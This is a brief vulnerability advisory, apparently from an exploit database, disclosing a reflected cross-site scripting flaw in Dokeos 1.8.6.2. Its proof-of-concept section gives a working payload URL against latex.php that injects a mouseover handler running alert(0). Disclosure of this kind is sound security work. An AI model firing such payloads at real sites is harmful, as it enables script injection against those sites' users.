------------------------------------------------------------------------
Software................Dokeos 1.8.6.2
Vulnerability...........Reflected Cross-site Scripting
Download................http://www.dokeos.com/
Release Date............2/12/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------

--Description--

A reflected cross-site scripting vulnerability in Dokeos 1.8.6.2 can
be exploited to execute arbitrary JavaScript.


--PoC--
http://localhost/dokeos/main/inc/latex.php?code=%22style=%22top:0;position:absolute;width:9999px;height:9999px;%22onmouseover%3d%22alert(0)